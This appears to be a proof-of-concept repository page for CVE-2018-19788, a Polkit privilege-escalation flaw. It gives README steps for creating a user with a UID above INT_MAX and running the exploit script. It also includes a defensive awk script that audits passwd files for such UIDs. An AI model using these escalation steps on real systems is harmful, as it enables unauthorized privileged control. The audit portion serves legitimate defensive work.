CVE-2018-19788 PoC — Red Hat PolicyKit Input Validation Error Vulnerability

Source
Associated Vulnerability
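Title: Red Hat PolicyKit Input Validation Error Vulnerability (CVE-2018-19788)
Description: Red Hat PolicyKit (Polkit) is a tool from the US company Red Hat for controlling application privileges on Unix-compatible systems. It gives modern desktops a central framework for authorizing ordinary applications to perform privileged work. A security vulnerability exists in Red Hat PolicyKit version 0.115. An attacker can exploit it to execute arbitrary systemctl commands.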
Description
Silly easy exploit for CVE-2018-19788
Readme
# CVE-2018-19788
Silly easy exploit for CVE-2018-19788

To use this, you must either create a user with UID > INT_MAX in Policy Kit or already have a low-priv user with said UID.

UID can be specified in user creation as follows, and used before execution of the script:

```bash
$ useradd -u 4000000001 PrivEsc
$ passwd PrivEsc
$ su PrivEsc
$ chmod +x /tmp/CVE-2018-19788_PrivEsc.sh
$ /tmp/CVE-2018-19788_PrivEsc.sh
```

Please note this is merely for research and you are responsible for your own usage of any code found in this repository or any other, as common sense dictates.
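
A defender-side check for the precondition the README describes, added here as an example and not part of the original repository: it lists accounts in a passwd-format file whose UID exceeds INT_MAX (2147483647). The function names and the sample entries are constructed for illustration.

```shell
#!/bin/sh
# Added audit example (not from the original repository).
# INT_MAX for a 32-bit signed int, the threshold named in the README.
INT_MAX=2147483647

# sample_passwd: prints constructed passwd entries used to exercise the check.
sample_passwd() {
    cat <<'EOF'
# constructed sample data
root:x:0:0:root:/root:/bin/bash
alice:x:1000:1000:Alice:/home/alice:/bin/bash
edge:x:2147483647:2147483647::/home/edge:/bin/sh
PrivEsc:x:4000000001:4000000001::/home/PrivEsc:/bin/bash
broken:x:notanumber:1::/:/bin/false
EOF
}

# find_high_uids FILE
# Prints "name uid shell" for every entry whose numeric UID exceeds INT_MAX.
# Returns 0 if at least one such account exists, 1 if none,
# 2 if the file cannot be read.
find_high_uids() {
    file=$1
    [ -r "$file" ] || { echo "cannot read $file" >&2; return 2; }
    awk -F: -v max="$INT_MAX" '
        /^[ \t]*(#|$)/ { next }                  # skip comments and blank lines
        NF < 7 || $3 !~ /^[0-9]+$/ { next }      # skip malformed entries
        ($3 + 0) > max { print $1, $3, $7; hit = 1 }
        END { exit (hit ? 0 : 1) }
    ' "$file"
}

# When run as a script with a file argument (e.g. /etc/passwd), audit that file.
if [ "$#" -gt 0 ]; then
    find_high_uids "$1"
fi
```

On hosts that resolve users through LDAP or SSSD, save the output of `getent passwd` to a file and audit that, since those accounts do not appear in `/etc/passwd`.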
File Snapshot

```
[4.0K] /data/pocs/99535a92e15289286106db0fdd478c79491c68b5
├── [1.2K] CVE-2018-19788_PrivEsc.sh
├── [ 34K] LICENSE
└── [ 583] README.md

0 directories, 3 files
```